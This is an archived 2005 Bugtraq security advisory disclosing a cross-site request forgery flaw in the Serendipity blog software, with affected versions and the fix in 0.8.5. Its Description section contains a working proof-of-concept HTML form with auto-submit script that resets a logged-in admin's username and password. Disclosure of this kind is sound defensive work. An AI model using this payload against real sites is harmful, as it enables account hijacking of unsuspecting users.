Serendipity: Account Hijacking / CSRF Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Serendipity: Account Hijacking / CSRF Vulnerability
From: enji@xxxxxxxxxxxxxxxxxxxx
Date: 29 Sep 2005 12:58:48 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

===========================================================
Serendipity: Account Hijacking / CSRF Vulnerability
===========================================================
Technical University of Vienna Security Advisory
TUVSA-0509-001, September 29, 2005
===========================================================


Affected applications
----------------------

Serendipity (www.s9y.org)

Versions 0.8.4 and prior.


Description
------------

An attacker is able to change the username and password of a logged-in user
(and can therefore hijack his account) by tricking the user into clicking a
link to a page with the following contents:

    <form 
action="http://your-server/path-to-s9y/serendipity_admin.php?serendipity[adminModule]=personal&amp;serendipity[adminAction]=save";
 method="post">
        <input type="text" name="username" value="evilguy" />
        <input type="text" name="password" value="evilpass" />
        <input type="text" name="realname" value="John Doe" />
        <input type="text" name="userlevel" value="255"/>
        <input type="text" name="email" value="john@xxxxxxxxxxx" />
        <input type="text" name="lang" value="en"/>
        <input type="submit" name="SAVE" value="Save" />
    </form>

    <script type="text/javascript">
      document.forms[0].submit();
    </script>

The fields "your-server" and "path-to-s9y" in the form's action attribute have 
to
be adjusted accordingly. 

Similar attacks (termed as "Cross-Site Request Forgery" or CSRF) can be
launched for performing other requests disguised as the victim.
However, this problem is not limited to Serendipity, but affects a large
number of comparable web applications available at this time.


Solution
---------

Version 0.8.5 of Serendipity is reported by the developers to fix
the Account Hijacking vulnerability as well as the general CSRF problem itself.


Acknowledgements
-----------------

Thanks to Serendipity developer Garvin Hicking for his quick response and
professional cooperation.


Nenad Jovanovic
Secure Systems Lab 
Technical University of Vienna 
www.seclab.tuwien.ac.at

Follow-Ups:
- Re: Serendipity: Account Hijacking / CSRF Vulnerability
  - From: kreon

Prev by Date: [SECURITY] [DSA 797-2] Updated zsync i386 packages fix build error
Next by Date: Re: PHP-Fusion v6.00.109 SQL Injection / admin|users credentials disclosure
Previous by thread: [SECURITY] [DSA 797-2] Updated zsync i386 packages fix build error
Next by thread: Re: Serendipity: Account Hijacking / CSRF Vulnerability
Index(es):
- Date
- Thread